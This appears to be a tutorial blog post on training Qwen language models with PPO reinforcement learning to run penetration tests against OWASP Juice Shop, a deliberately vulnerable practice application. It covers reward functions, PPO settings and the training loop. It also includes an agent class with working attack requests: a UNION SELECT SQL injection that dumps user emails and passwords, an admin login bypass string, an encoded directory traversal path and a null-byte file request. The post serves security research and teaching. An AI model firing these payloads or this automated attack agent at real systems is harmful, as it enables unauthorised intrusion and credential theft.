Introduction: When LLM Meets Cybersecurity

If you're reading this, you might be wondering - can we really teach a computer to hack? Not in the malicious sense, but in the way ethical hackers work to make systems safer. This is exactly what this project attempts to do, and I'll be honest - it's both fascinating and a bit overwhelming at first.

The project we're exploring uses something called Proximal Policy Optimization (PPO) to train language models to perform penetration testing on a vulnerable web application called OWASP Juice Shop (Link: https://owasp.org/www-project-juice-shop/). Don't worry if these terms sound intimidating - we'll break everything down together.

What Actually Happens Here?

The Big Picture (In Simple Terms)

Imagine teaching a student to become a cybersecurity expert. You'd:

- Show them vulnerable systems

- Explain what attacks to try

- Give them feedback when they succeed or fail

- Let them practice until they get better



That's essentially what this project does, but with AI:

🤖 LLM Model (Qwen) ← Student

🕸️ Juice Shop ← Practice Lab

🎯 PPO Algorithm ← Teaching Method

📊 Rewards ← Grades/Feedback

The core concept of Proximal Policy Optimization in cybersecurity training

The Dataset: Real Attacks, Real Results

The heart of this system is a dataset containing 240 real penetration testing attempts against Juice Shop. Each entry looks like this (simplified):

```json
{
  "state": {
    "user_id": 51,
    "auth": "Yes",
    "headers": {"Authorization": "Bearer token..."}
  },
  "action": {
    "description": "SQL Injection - User enumeration",
    "difficulty": 2
  },
  "reward": 16,
  "success": true
}
```

What struck me when first examining this data is how human it feels. Each record captures a real attempt to find a vulnerability - sometimes successful, sometimes not. The dataset has a 2.9% success rate with an average reward of 18.7 points per attempt. This mirrors real penetration testing, where most attempts fail but the successes are valuable.
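If you want to check figures like these against your own copy of the data, a few lines of Python are enough. The sketch below assumes the records sit in a JSON Lines file (one object per line) with top-level `reward` and `success` fields as in the sample above; `load_records` and `summarize` are hypothetical helper names, not part of the project. For scale, 2.9% of 240 records works out to about 7 successful attempts.

```python
import json
from typing import Iterable, List, Tuple


def load_records(path: str) -> List[dict]:
    """Read one JSON object per line (JSON Lines); the file layout is an assumption."""
    with open(path, encoding="utf-8") as f:
        return [json.loads(line) for line in f if line.strip()]


def summarize(records: Iterable[dict]) -> Tuple[int, float, float]:
    """Return (count, success rate, mean reward) for a list of attempt records."""
    records = list(records)
    if not records:
        return 0, 0.0, 0.0
    successes = sum(1 for r in records if r.get("success"))
    total_reward = sum(float(r.get("reward", 0)) for r in records)
    return len(records), successes / len(records), total_reward / len(records)


sample = [
    {"reward": 16, "success": True},
    {"reward": 2, "success": False},
    {"reward": 10, "success": False},
    {"reward": 2, "success": False},
]
count, rate, mean_reward = summarize(sample)
print(f"{count} attempts, {rate:.1%} success, {mean_reward:.1f} mean reward")
# → 4 attempts, 25.0% success, 7.5 mean reward
```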

The Technical Architecture: Breaking It Down

1. The Agent (JuiceShopAgent)

This is the "hands" of our system - it actually interacts with the vulnerable web application:

- Registers new users for each testing session

- Executes 25+ different attack types (SQL injection, XSS, directory traversal, etc.)

- Captures application state before and after each attack

- Calculates rewards based on success and vulnerability severity

The agent can perform sophisticated attacks like:

- `UNION SELECT` SQL injections on search endpoints

- Admin login bypasses using `admin@juice-sh.op'--`

- Directory traversal with encoded paths like `%25252e%25252e%25252f`

- Business logic exploitation (negative quantity orders)
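Encoded payloads like these are easier to read once you peel the encoding off layer by layer. Each `%25` decodes to a literal `%`, so `%25252e` needs three decoding passes before it becomes `.`; stacking encodings like this is a common way to slip `../` past a filter that decodes only once. The helper below is an illustrative sketch built on Python's standard `urllib.parse.unquote`, not code from the project.

```python
from urllib.parse import unquote


def decode_layers(value: str, max_rounds: int = 5) -> tuple[str, int]:
    """URL-decode repeatedly until the string stops changing.

    Returns the decoded string and the number of passes that changed it.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:  # nothing left to decode
            break
        value = decoded
        rounds += 1
    return value, rounds


print(decode_layers("%25252e%25252e%25252f"))  # → ('../', 3)
print(decode_layers("admin@juice-sh.op'--"))   # → ("admin@juice-sh.op'--", 0)
```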

2. The Brain (PPO Training)



Here's where things get interesting. The system uses Proximal Policy Optimization, which is a type of reinforcement learning. Think of it as a careful way to teach the AI:

Traditional Training: "Here's the right answer, memorize it"

PPO Training: "Try things, get feedback, gradually improve"

The PPO algorithm is particularly good because it:

- Won't make dramatic changes that could break learning

- Balances exploration vs exploitation (trying new things vs using what works)

- Uses value functions to predict long-term success

How the PPO agent learns from rewards in the cybersecurity environment
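The "won't make dramatic changes" property comes from PPO's clipped surrogate objective (Schulman et al., 2017). For each sample, the probability ratio between the new and old policy is clipped to `[1 - ε, 1 + ε]`, and the loss takes the more pessimistic of the clipped and unclipped terms. The function below is a minimal scalar sketch of that formula; TRL's trainer applies the same idea per token with masking and batching, so treat this as an illustration rather than the library's code. The default `clip_range=0.1` mirrors the `cliprange` value used in this project's config.

```python
import math
from typing import Sequence


def ppo_clip_loss(
    new_logprobs: Sequence[float],
    old_logprobs: Sequence[float],
    advantages: Sequence[float],
    clip_range: float = 0.1,
) -> float:
    """Mean clipped-surrogate policy loss (to be minimized)."""
    losses = []
    for new_lp, old_lp, adv in zip(new_logprobs, old_logprobs, advantages):
        ratio = math.exp(new_lp - old_lp)  # pi_new(a|s) / pi_old(a|s)
        clipped_ratio = min(max(ratio, 1 - clip_range), 1 + clip_range)
        # Take the pessimistic (smaller) objective, then negate it to get a loss
        objective = min(ratio * adv, clipped_ratio * adv)
        losses.append(-objective)
    return sum(losses) / len(losses)


# A ratio of 1.5 with a positive advantage is capped at 1.1: no extra gain past the clip
print(ppo_clip_loss([math.log(1.5)], [0.0], [1.0]))  # ≈ -1.1
```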

3. The Model (Qwen Language Models)

The project supports multiple Qwen models:

- Qwen2.5-1.5B-Instruct: 6-8GB VRAM

- Qwen2.5-3B-Instruct: 10-12GB VRAM

- Qwen2.5-7B-Instruct: 16-20GB VRAM
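A quick back-of-the-envelope check shows why the requirements grow with model size: in bfloat16 each parameter takes 2 bytes, so the weights alone need about 2 GB per billion parameters. The sketch below uses the nominal sizes from the model names (actual parameter counts differ slightly) and deliberately ignores the value head, activations, optimizer state, and the reference copy PPO typically keeps for its KL penalty, all of which push real usage above this floor.

```python
BYTES_PER_BF16_PARAM = 2

# Nominal parameter counts taken from the model names (approximate)
MODELS = {
    "Qwen2.5-1.5B-Instruct": 1.5e9,
    "Qwen2.5-3B-Instruct": 3e9,
    "Qwen2.5-7B-Instruct": 7e9,
}


def weight_memory_gb(num_params: float, bytes_per_param: int = BYTES_PER_BF16_PARAM) -> float:
    """Memory for the weights alone, in GB (1 GB = 1e9 bytes)."""
    return num_params * bytes_per_param / 1e9


for name, params in MODELS.items():
    print(f"{name}: ~{weight_memory_gb(params):.0f} GB of bf16 weights")
# → ~3 GB, ~6 GB and ~14 GB respectively
```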

Each model can be trained in two ways:

- Full Fine-tuning: Updates all model parameters (better accuracy, more memory)

- LoRA (Low-Rank Adaptation): Updates only small adapter layers (faster, less memory)
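To see why LoRA is so much lighter, consider one weight matrix `W` of shape `d × k`. LoRA freezes `W` and trains two small matrices, `B` (`d × r`) and `A` (`r × k`), adding `(alpha / r) · B A x` to the layer's output, so the trainable parameter count drops from `d · k` to `r · (d + k)`. The pure-Python sketch below illustrates both points; the 4096 × 4096 shape and rank 8 are illustrative values, not settings taken from this project. Because `B` starts at zero in LoRA, the adapted layer initially behaves exactly like the frozen one.

```python
from typing import List

Matrix = List[List[float]]


def matvec(m: Matrix, x: List[float]) -> List[float]:
    return [sum(a * b for a, b in zip(row, x)) for row in m]


def lora_trainable_params(d: int, k: int, r: int) -> int:
    """Trainable parameters LoRA adds for one d x k matrix at rank r."""
    return r * (d + k)


def lora_forward(w: Matrix, a: Matrix, b: Matrix, x: List[float],
                 alpha: float, r: int) -> List[float]:
    """h = W x + (alpha / r) * B (A x); W stays frozen, only A and B are trained."""
    base = matvec(w, x)
    update = matvec(b, matvec(a, x))
    return [h + (alpha / r) * u for h, u in zip(base, update)]


d = k = 4096
r = 8
full = d * k
lora = lora_trainable_params(d, k, r)
print(f"full: {full:,}  lora: {lora:,}  ratio: {lora / full:.2%}")
# → full: 16,777,216  lora: 65,536  ratio: 0.39%

# Tiny layer (d=2, k=2, r=1): with B at zero, the output equals W x
W = [[1.0, 2.0], [3.0, 4.0]]
A = [[0.5, -0.5]]
B = [[0.0], [0.0]]
print(lora_forward(W, A, B, [2.0, 0.0], alpha=16, r=1))  # → [2.0, 6.0]
```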

The Learning Process: How It Actually Works

Reward Engineering: The Heart of Learning

We implemented a basic reward function:

```python
def calculate_smart_reward(challenges_before, challenges_after,
                           status_code, response_text, difficulty):
    reward = 0

    # Big rewards for actually solving challenges
    new_solved = challenges_after - challenges_before  # set difference
    if new_solved:
        reward = len(new_solved) * difficulty * 20

    # Smaller rewards for promising attempts
    if status_code == 200: reward += 10
    if 'admin' in response_text.lower(): reward += 8
    if 'sql' in response_text.lower(): reward += 6

    return reward
```

This means the AI gets rewarded for:

- Actually solving challenges (big rewards)

- Getting interesting responses (medium rewards)

- Making reasonable attempts (small rewards)

Training Variants: Different Approaches

The project includes several training strategies:

train_ppo.py: The main approach

- Standard PPO with good defaults

- Works for most use cases

- 5 epochs, balanced parameters

train_stable.py: The careful approach

- Conservative learning rates

- Extra stability checks

- Gradient clipping and volatility monitoring

- Best for consistent, reliable training

train_long.py: The thorough approach

- 10+ epochs with learning rate scheduling

- Early stopping when target is reached

- Comprehensive checkpointing

- Best for production-quality models
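The two extra ingredients in `train_long.py`, learning rate scheduling and stopping once a target is reached, fit in a few lines. The script's actual schedule and stopping criterion aren't shown here, so the cosine decay and the rolling-mean-reward rule below are assumptions chosen for illustration, and `cosine_lr` / `TargetRewardStopper` are hypothetical names.

```python
import math
from collections import deque


def cosine_lr(step: int, total_steps: int, base_lr: float, min_lr: float = 0.0) -> float:
    """Cosine decay from base_lr at step 0 down to min_lr at total_steps."""
    progress = min(step, total_steps) / total_steps
    return min_lr + 0.5 * (base_lr - min_lr) * (1 + math.cos(math.pi * progress))


class TargetRewardStopper:
    """Signal a stop once the rolling mean of batch rewards reaches a target."""

    def __init__(self, target: float, window: int = 10):
        self.target = target
        self.recent = deque(maxlen=window)

    def update(self, batch_mean_reward: float) -> bool:
        self.recent.append(batch_mean_reward)
        if len(self.recent) < self.recent.maxlen:
            return False  # not enough history yet
        return sum(self.recent) / len(self.recent) >= self.target


stopper = TargetRewardStopper(target=10.0, window=3)
for step, reward in enumerate([5.0, 15.0, 12.0]):
    lr = cosine_lr(step, total_steps=100, base_lr=1e-6)
    if stopper.update(reward):
        print(f"target reached at step {step} (lr={lr:.2e})")
        break
```

Averaging over a window rather than reacting to a single batch matters here because, with a 2.9% success rate in the data, individual batch rewards are noisy.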

The Results: What Actually Gets Learned

After training, the models show interesting behavior changes:

Before Training (Generic AI response):

Query: "Next penetration testing action?"

Response: "I can help you with general cybersecurity information..."

After Training (Focused penetration testing):

Query: "User 51, Auth: Yes, Previous: SQL Injection. Next action?"

Response: "Try XSS attack on search parameter or check admin endpoints"

The model learns to:

- Recognize vulnerability patterns in application state

- Suggest specific technical attacks rather than generic advice

- Chain attacks logically (following SQL injection with privilege escalation)

- Focus on high-value targets (admin endpoints, sensitive data)

Challenges and Limitations

What Works Well

- Consistent learning: Models reliably improve over training epochs

- Technical accuracy: Learned attacks are valid penetration testing techniques

- Contextual awareness: Models consider application state when suggesting actions

What's Still Hard

- Low success rate: Even trained models don't solve challenges frequently

- Computational cost: Full fine-tuning requires significant GPU resources

- Generalization: Models are specialized for Juice Shop and may not transfer to other applications

Why This Matters

For Cybersecurity

This approach could eventually help:

- Automate penetration testing for common vulnerability patterns

- Train security professionals with AI-assisted learning

- Continuously assess the security of web applications

For AI Research

The project demonstrates:

- Practical reinforcement learning on real-world security tasks

- Integration of language models with interactive environments

- Reward engineering for complex, sparse-reward domains

How AI Learns to Hack (The Implementation Details)

Walking through the actual algorithms and code that make this system work

Introduction: Opening the Hood

Let's walk through the key components together.

1. The Data Generation Engine: JuiceShopAgent

The Foundation: Setting Up the Testing Environment

The JuiceShopAgent class is the workhorse that actually performs penetration testing. Here's how it sets up:

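```python
import requests


class JuiceShopAgent:
    def __init__(self):
        self.session = requests.Session()
        # requests ignores a `timeout` attribute on Session objects, so keep the
        # value here and pass timeout=self.timeout on each request call
        self.timeout = 15
        self.current_user_id = None
        self.basket_id = None
        self.admin_email = "admin@juice-sh.op"
```

This might look simple, but there's wisdom here. Each testing session gets: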

- Its own HTTP session (cookies and state management)

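- Reasonable timeouts (15 seconds - enough for responses, short enough to avoid hanging), provided the value is passed to each request, because `requests` ignores a `timeout` attribute set on a session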

- User context tracking (user_id and basket_id for stateful attacks)
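One caveat on timeouts: `requests` has no session-wide timeout setting, so a request only times out if `timeout=` is passed to that call (`session.get(url, timeout=15)`). A common workaround, sketched below, is a small `Session` subclass that fills in a default; `TimeoutSession` and `default_timeout` are hypothetical names, not part of the project.

```python
import requests


class TimeoutSession(requests.Session):
    """requests.Session that applies a default timeout to every request."""

    def __init__(self, default_timeout: float = 15.0):
        super().__init__()
        self.default_timeout = default_timeout

    def request(self, method, url, **kwargs):
        # get(), post(), etc. all route through request(), so one override covers them;
        # an explicit timeout= passed by the caller still takes precedence
        kwargs.setdefault("timeout", self.default_timeout)
        return super().request(method, url, **kwargs)


# Possible use inside JuiceShopAgent.__init__ (hypothetical):
# self.session = TimeoutSession(default_timeout=15)
```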

Smart User Registration: Creating Fresh Testing Contexts

One clever aspect is how it creates fresh users for each test:

```python
from typing import Optional, Tuple


# Method of JuiceShopAgent; BASE_URL, logger, random, uuid and requests come from the module
def register_and_login(self) -> Optional[Tuple[str, str]]:
    """Register new user and login"""
    email = f"user{uuid.uuid4().hex[:8]}@juice-sh.op"
    password = f"Pass{random.randint(1000, 9999)}!"

    try:
        # Register with random security question
        register_data = {
            "email": email,
            "password": password,
            "passwordRepeat": password,
            "securityQuestion": {
                "id": random.randint(1, 12),
                "answer": f"answer{random.randint(100, 999)}"
            }
        }
        res = self.session.post(f"{BASE_URL}/api/Users", json=register_data)

        if res.status_code == 201:
            # Login and get authentication token
            login_res = self.session.post(
                f"{BASE_URL}/rest/user/login",
                json={"email": email, "password": password}
            )
            if login_res.status_code == 200:
                token = login_res.json()['authentication']['token']
                self.session.headers.update({"Authorization": f"Bearer {token}"})
                return email, password
    except requests.RequestException as e:
        # Assumed: the original excerpt's error handling isn't shown; log and fall through
        logger.debug(f"Registration/login failed: {e}")

    return None  # Registration or login did not succeed
```

What I appreciate about this approach:

- Unique identities: Each test run gets a fresh user context

- Realistic credentials: Passwords follow common patterns

- Proper authentication flow: Login → get token → update headers

- Error handling: Graceful failure if registration doesn't work

The Attack Arsenal: Proven Vulnerability Exploits

The heart of the system is get_proven_attacks(), which returns a list of attacks that actually work against Juice Shop:

```python
from typing import Callable, List, Tuple

import requests


# Method of JuiceShopAgent; BASE_URL is a module-level constant
def get_proven_attacks(self) -> List[Tuple[str, Callable[[], requests.Response], int]]:
    """Get attacks that are proven to work with current Juice Shop"""
    attacks = [
        # SQL Injection attacks
        ("SQL Injection - Search bypass",
         lambda: self.session.get(f"{BASE_URL}/rest/products/search?q=qwert%27))%20UNION%20SELECT%20id,%20email,%20password,%20%274%27,%20%275%27,%20%276%27,%20%277%27,%20%278%27,%20%279%27%20FROM%20Users--"), 2),
        ("SQL Injection - Login bypass admin",
         lambda: self._admin_login_bypass(), 3),

        # File access attacks
        ("Access confidential document",
         lambda: self.session.get(f"{BASE_URL}/ftp/acquisitions.md"), 1),
        ("Poison null byte attack",
         lambda: self.session.get(f"{BASE_URL}/ftp/eastere.gg%2500.md"), 3),

        # Business logic flaws
        ("Negative quantity order",
         lambda: self._negative_quantity_working(), 3),
    ]
    return attacks
```

Each attack is structured as:

- Description: Human-readable name

- Function: Lambda or method that executes the attack

- Difficulty: Integer rating (1=easy, 3=hard)
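Because every entry shares the same `(description, function, difficulty)` shape, a driver loop can run them uniformly. The sketch below is an assumption about how such a loop might look, not the project's code: `AttackResult` and `run_attacks` are hypothetical, and the stub attacks stand in for real HTTP calls so the example runs without a Juice Shop instance. Exceptions are recorded rather than raised, so one failing attack doesn't stop the rest of the session.

```python
from dataclasses import dataclass
from types import SimpleNamespace
from typing import Any, Callable, List, Optional, Tuple

Attack = Tuple[str, Callable[[], Any], int]


@dataclass
class AttackResult:
    description: str
    difficulty: int
    status_code: Optional[int]
    error: Optional[str] = None


def run_attacks(attacks: List[Attack]) -> List[AttackResult]:
    """Execute each attack callable and record its status code or error."""
    results = []
    for description, attack_fn, difficulty in attacks:
        try:
            response = attack_fn()
            results.append(AttackResult(description, difficulty, response.status_code))
        except Exception as exc:  # keep going even if one attack blows up
            results.append(AttackResult(description, difficulty, None, str(exc)))
    return results


def _timeout():
    raise TimeoutError("no response")


# Stub attacks standing in for real requests against Juice Shop
stubs: List[Attack] = [
    ("Access confidential document", lambda: SimpleNamespace(status_code=200), 1),
    ("Poison null byte attack", lambda: SimpleNamespace(status_code=403), 3),
    ("Negative quantity order", _timeout, 3),
]
for result in run_attacks(stubs):
    print(result)
```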

The Smart Reward System: Teaching Through Feedback

This is where the system gets really intelligent. The reward calculation doesn't just say "success" or "failure" - it provides nuanced feedback:

```python
import logging

logger = logging.getLogger(__name__)


def calculate_smart_reward(challenges_before: set, challenges_after: set,
                           status_code: int, response_text: str, difficulty: int,
                           url: str) -> int:
    """Smart reward calculation based on actual vulnerabilities"""
    new_solved = challenges_after - challenges_before
    reward = 0

    # Base reward for solving challenges (BIG rewards)
    if new_solved:
        # 20 points per difficulty level per newly solved challenge (60 for one difficulty-3 solve)
        reward = len(new_solved) * difficulty * 20
        logger.info(f"🎉 CHALLENGE SOLVED: {list(new_solved)} - Reward: {reward}")
        return reward

    # Status-based rewards (medium rewards)
    if status_code == 200:
        reward += 10

        # Content analysis for potential vulnerabilities
        if response_text:
            content_lower = response_text.lower()

            # SQL injection indicators
            if any(indicator in content_lower for indicator in
                   ['email', 'password', 'users', 'admin', 'syntax error']):
                reward += 15

            # File access indicators
            if any(indicator in content_lower for indicator in
                   ['markdown', 'acquisitions', 'legal', 'confidential']):
                reward += 12

    # Even failed attempts can be informative
    elif status_code == 401: reward += 3  # Auth required - interesting!
    elif status_code == 403: reward += 5  # Forbidden - we found something
    elif status_code >= 500: reward += 6  # Server errors reveal info

    return max(reward, 2)  # Always give some reward for trying
```

This reward structure teaches the AI:

- Big successes deserve big rewards (each newly solved challenge earns 20-60 points, depending on the attack's difficulty rating)

- Informative failures still count (401, 403, and 5xx responses earn 3-6 points)

- Even attempts matter (minimum 2 points for any action)

The beauty is in the content analysis - the system recognizes when response text contains vulnerability-relevant keywords, even if it didn't solve the challenge completely.

2. The Training Engine: PPO Implementation

Dataset Preparation: From Raw Data to Training Examples

The training process starts by converting raw penetration testing data into AI-friendly format:

```python
import json

from datasets import load_dataset


def build_dataset(tokenizer, data_path, split="train"):
    """Build dataset for training"""
    ds = load_dataset("json", data_files=data_path, split=split)

    def create_prompt(sample):
        # Improve prompt for chat model
        system_prompt = "You are an expert cybersecurity penetration tester. Analyze the current state of a web application and suggest the next tactical action to find vulnerabilities."
        state_info = json.dumps(sample['state'], indent=2)

        prompt = f"<|im_start|>system\n{system_prompt}<|im_end|>\n"
        prompt += f"<|im_start|>user\n"
        prompt += f"Current web application state:\n```json\n{state_info}\n```\n\n"
        prompt += f"What should be the next penetration testing action? Provide a specific, actionable step.<|im_end|>\n"
        prompt += f"<|im_start|>assistant\n"
        return prompt

    def tokenize(sample):
        sample["query"] = create_prompt(sample)
        encoded = tokenizer(
            sample["query"],
            # Fixed-length padding lets the default collator stack batches, but with
            # right padding the pad tokens sit between the prompt and the generated text
            padding="max_length",
            truncation=True,
            max_length=512,
            return_tensors="pt"
        )
        sample["input_ids"] = encoded["input_ids"].squeeze()
        return sample

    ds = ds.map(tokenize, batched=False)
    ds.set_format(type="torch")
    return ds
```

The prompt engineering here is crucial:

- Clear role definition: "You are an expert cybersecurity penetration tester"

- Context provision: JSON state of the web application

- Specific instruction: "Provide a specific, actionable step"

- Proper formatting: Using the Qwen chat template with `<|im_start|>` tokens
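If you'd rather not hand-assemble the special tokens, the same layout can be produced from a list of role/content messages. The helper below is a hypothetical pure-Python sketch of the ChatML structure that `create_prompt` writes by hand. With Hugging Face `transformers`, `tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)` renders the model's own template instead, which is the safer choice if the template ever changes.

```python
from typing import Dict, List


def render_chatml(messages: List[Dict[str, str]], add_generation_prompt: bool = True) -> str:
    """Render role/content messages in the ChatML layout used by create_prompt."""
    parts = [f"<|im_start|>{m['role']}\n{m['content']}<|im_end|>\n" for m in messages]
    if add_generation_prompt:
        parts.append("<|im_start|>assistant\n")  # the model continues from here
    return "".join(parts)


messages = [
    {"role": "system", "content": "You are an expert cybersecurity penetration tester."},
    {"role": "user", "content": "What should be the next penetration testing action?"},
]
print(render_chatml(messages))
```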

PPO Configuration: The Learning Parameters

These parameters control how the AI learns:

```python
from trl import PPOConfig

# args: parsed command-line arguments, defined elsewhere in the script
ppo_config = PPOConfig(
    model_name=args.model_name,
    learning_rate=1e-6,              # Conservative learning rate
    batch_size=8,                    # Samples collected per PPO step
    mini_batch_size=2,               # Samples per forward/backward pass
    gradient_accumulation_steps=4,   # 2 x 4 = 8 samples per optimizer update

    # PPO hyperparameters
    ppo_epochs=6,                    # 6 optimization passes over each batch
    gamma=0.99,                      # Future reward discount
    lam=0.95,                        # GAE lambda for advantage calculation
    cliprange=0.1,                   # Clip policy updates (conservative!)
    cliprange_value=0.1,             # Clip value function updates
    vf_coef=0.2,                     # Value function loss weight
    max_grad_norm=1.0,               # Gradient clipping
    target_kl=0.05,                  # KL threshold for early stopping (only used with early_stopping=True)
    whiten_rewards=True,             # Normalize rewards
)
```

I want to highlight some key choices:

- Conservative clipping (0.1): Prevents the model from changing too drastically

- Small learning rate (1e-6): Slow, steady learning

- Reward whitening: Normalizes rewards so the model doesn't get confused by scale
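`gamma`, `lam`, and reward whitening are easiest to understand on a toy trajectory. The sketch below computes Generalized Advantage Estimation (GAE): each step's TD error `r_t + gamma * V(s_{t+1}) - V(s_t)` is accumulated backwards with decay `gamma * lam`. The `whiten` function shows the textbook form of whitening (zero mean, unit variance). This is a simplified, plain-Python illustration: in TRL's language-model setup the scalar reward is added at the last response token and per-token KL penalties fill in the rest, and the library's own whitening may differ in details (for example, whether the mean is shifted).

```python
import math
from typing import List, Tuple


def gae(rewards: List[float], values: List[float], gamma: float = 0.99,
        lam: float = 0.95) -> Tuple[List[float], List[float]]:
    """Return (advantages, returns).

    values holds one entry per step plus a final bootstrap value
    (use 0.0 if the episode ends after the last step).
    """
    advantages = [0.0] * len(rewards)
    running = 0.0
    for t in reversed(range(len(rewards))):
        delta = rewards[t] + gamma * values[t + 1] - values[t]  # TD error
        running = delta + gamma * lam * running
        advantages[t] = running
    returns = [adv + v for adv, v in zip(advantages, values[:-1])]
    return advantages, returns


def whiten(xs: List[float], eps: float = 1e-8) -> List[float]:
    """Shift to zero mean and scale to unit (population) standard deviation."""
    mean = sum(xs) / len(xs)
    var = sum((x - mean) ** 2 for x in xs) / len(xs)
    return [(x - mean) / math.sqrt(var + eps) for x in xs]


# Reward only at the final step, as when a single score arrives at the end of a response
adv, ret = gae(rewards=[0.0, 0.0, 1.0], values=[0.0, 0.0, 0.0, 0.0])
print([round(a, 4) for a in adv])  # → [0.8845, 0.9405, 1.0]
print(whiten([2.0, 10.0, 60.0]))
```

With `gamma * lam = 0.9405`, the final reward still reaches earlier steps but fades geometrically, which is how credit flows back from the end of a response.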

The Training Loop: Where Learning Happens

The core training loop is where the AI actually learns:

```python
import torch
from tqdm import tqdm

batch_count = 0  # running batch counter (its initialization is not shown in the original excerpt)

for epoch in range(args.epochs):
    for batch in tqdm(ppo_trainer.dataloader, desc=f"Epoch {epoch + 1}"):
        query_tensors = batch["input_ids"]

        # Convert batch tensor to list (PPO requirement)
        if isinstance(query_tensors, torch.Tensor) and query_tensors.dim() == 2:
            query_tensors = [query_tensors[i] for i in range(query_tensors.size(0))]

        # Generate responses from current model
        response_tensors = ppo_trainer.generate(
            query_tensors,
            return_prompt=False,
            **generation_kwargs
        )

        # Get rewards from original dataset.
        # Note: dataset_idx depends only on batch_count, so every query in this batch
        # gets the same logged reward, independent of the generated response.
        rewards = []
        for i in range(len(query_tensors)):
            dataset_idx = (batch_count % len(dataset))
            reward_value = dataset[dataset_idx]["reward"]
            rewards.append(float(reward_value))

        reward_tensors = [torch.tensor(r, dtype=torch.float32) for r in rewards]

        # PPO optimization step
        stats = ppo_trainer.step(query_tensors, response_tensors, reward_tensors)

        # Log progress
        batch_mean_reward = sum(rewards) / len(rewards)
        value_loss = stats.get('ppo/loss/value', 0)
        policy_loss = stats.get('ppo/loss/policy', 0)
        batch_count += 1  # assumed: advance the counter once per batch
```

The sequence is:

- Get queries from the dataset

- Generate responses using current model

- Look up rewards from the logged dataset (they reflect recorded attempts, not the newly generated responses)

- Run PPO update to improve the model

- Log statistics to track progress
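As written, the loop looks rewards up by `batch_count` rather than by row, so every query in a batch shares one logged value. One way to at least keep each query paired with its own logged reward is a collator that returns per-column lists instead of stacked tensors, similar to the one in TRL's examples, combined with `remove_unused_columns=False` in `PPOConfig` (otherwise TRL may drop columns the model's forward pass doesn't use, such as `reward`). The sketch below shows the collator in isolation; `collate_as_lists` is a hypothetical name, and wiring it into the trainer through its `data_collator` argument is an assumption about this project's setup.

```python
from typing import Any, Dict, List


def collate_as_lists(rows: List[Dict[str, Any]]) -> Dict[str, List[Any]]:
    """Group dataset rows into a dict of per-column lists.

    Keeping lists (instead of stacking tensors) lets variable-length prompts
    through and keeps row i's reward aligned with row i's query.
    """
    return {key: [row[key] for row in rows] for key in rows[0]}


batch = collate_as_lists([
    {"input_ids": [1, 2, 3], "reward": 16.0},
    {"input_ids": [4, 5], "reward": 2.0},
])
rewards = [float(r) for r in batch["reward"]]  # one reward per query, in order
print(batch["input_ids"], rewards)
```

Even with this alignment, the reward still describes the recorded attempt rather than the text the model just generated; scoring the response itself would require executing or otherwise evaluating it.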

Generation Parameters: Controlling AI Creativity

The generation settings are carefully tuned for penetration testing:

```python
generation_kwargs = {
    "min_length": -1,             # No minimum-length constraint
    "top_k": 40,                  # Consider top 40 next tokens
    "top_p": 0.85,                # Nucleus sampling threshold
    "do_sample": True,            # Enable sampling (not greedy)
    "temperature": 0.6,           # Lower = more focused responses
    "pad_token_id": tokenizer.eos_token_id,
    "eos_token_id": tokenizer.eos_token_id,
    "max_new_tokens": 128,        # Reasonable response length
    "repetition_penalty": 1.05,   # Slight penalty for repetition
}
```

These settings balance:

- Creativity (sampling enabled, reasonable temperature)

- Focus (lower temperature, top-k filtering)

- Quality (repetition penalty, length limits)
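To see how temperature, `top_k`, and `top_p` interact, here is a simplified re-implementation on a toy vocabulary of four tokens. It follows the usual order (scale logits by temperature, keep the `top_k` highest, then keep the smallest set of tokens whose cumulative probability reaches `top_p`), but it is not Hugging Face's exact code and it leaves out the repetition penalty. `sampling_distribution` is a hypothetical name.

```python
import math
from typing import Dict, List


def sampling_distribution(logits: List[float], temperature: float = 0.6,
                          top_k: int = 40, top_p: float = 0.85) -> Dict[int, float]:
    """Return {token_id: probability} for the tokens that survive filtering."""
    scaled = [logit / temperature for logit in logits]
    # Top-k: keep the k highest-scoring token ids, best first
    ranked = sorted(range(len(scaled)), key=lambda i: scaled[i], reverse=True)[:top_k]
    # Softmax over the survivors (subtract the max for numerical stability)
    peak = scaled[ranked[0]]
    weights = {i: math.exp(scaled[i] - peak) for i in ranked}
    total = sum(weights.values())
    # Top-p: smallest prefix of the ranking whose probability mass reaches top_p
    nucleus, mass = [], 0.0
    for i in ranked:
        nucleus.append(i)
        mass += weights[i] / total
        if mass >= top_p:
            break
    kept = sum(weights[i] for i in nucleus)
    return {i: weights[i] / kept for i in nucleus}


logits = [2.0, 1.0, 0.0, -1.0]
print(sampling_distribution(logits, temperature=1.0, top_k=3, top_p=0.8))  # tokens 0 and 1 survive
print(sampling_distribution(logits, temperature=0.5, top_k=3, top_p=0.8))  # → {0: 1.0}
```

Halving the temperature sharpens the distribution enough that the top token alone passes the nucleus threshold, which is the "more focused" effect described above.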

3. Key Code Insights and Best Practices

Error Handling

Throughout the codebase, there's a consistent error handling pattern:

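```python
import logging

import requests

logger = logging.getLogger(__name__)


# Generic sketch of the pattern; guarded_call, risky_operation and
# process_success are illustrative placeholders
def guarded_call(risky_operation, process_success):
    try:
        result = risky_operation()
        if result.status_code == 200:
            return process_success(result)
        # Non-200 responses fall through, so this function returns None for them
    except Exception as e:
        logger.debug(f"Operation failed: {e}")
        # Return sensible default instead of crashing
        mock_response = requests.Response()
        mock_response.status_code = 500
        return mock_response
```

This approach: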

- Logs issues without stopping execution

- Provides mock responses to keep training going

- Degrades gracefully when components fail
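The same pattern can be packaged as a decorator so every attack function gets it for free. The sketch below is hypothetical (`with_fallback_response` is not a name from the project) and catches only `requests.RequestException`, which is narrower than the `except Exception` above, so genuine programming errors still surface. One thing worth watching: if a synthetic 500 response is later scored by `calculate_smart_reward`, it lands in the `status_code >= 500` branch and earns 6 points, so logging these fallbacks helps tell real server errors from network failures.

```python
import functools
import logging

import requests

logger = logging.getLogger(__name__)


def with_fallback_response(status_code: int = 500):
    """Decorator: turn request failures into a synthetic Response instead of raising."""
    def decorator(fn):
        @functools.wraps(fn)
        def wrapper(*args, **kwargs):
            try:
                return fn(*args, **kwargs)
            except requests.RequestException as exc:
                logger.debug("%s failed: %s", fn.__name__, exc)
                mock_response = requests.Response()
                mock_response.status_code = status_code
                return mock_response
        return wrapper
    return decorator


@with_fallback_response()
def unreachable_attack():
    # Stand-in for a real request that fails at the network level
    raise requests.ConnectionError("connection refused")


print(unreachable_attack().status_code)  # → 500
```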

Memory Management

The code is careful about GPU memory:

```python
import torch
from trl import AutoModelForCausalLMWithValueHead, PPOConfig

# Use appropriate data types
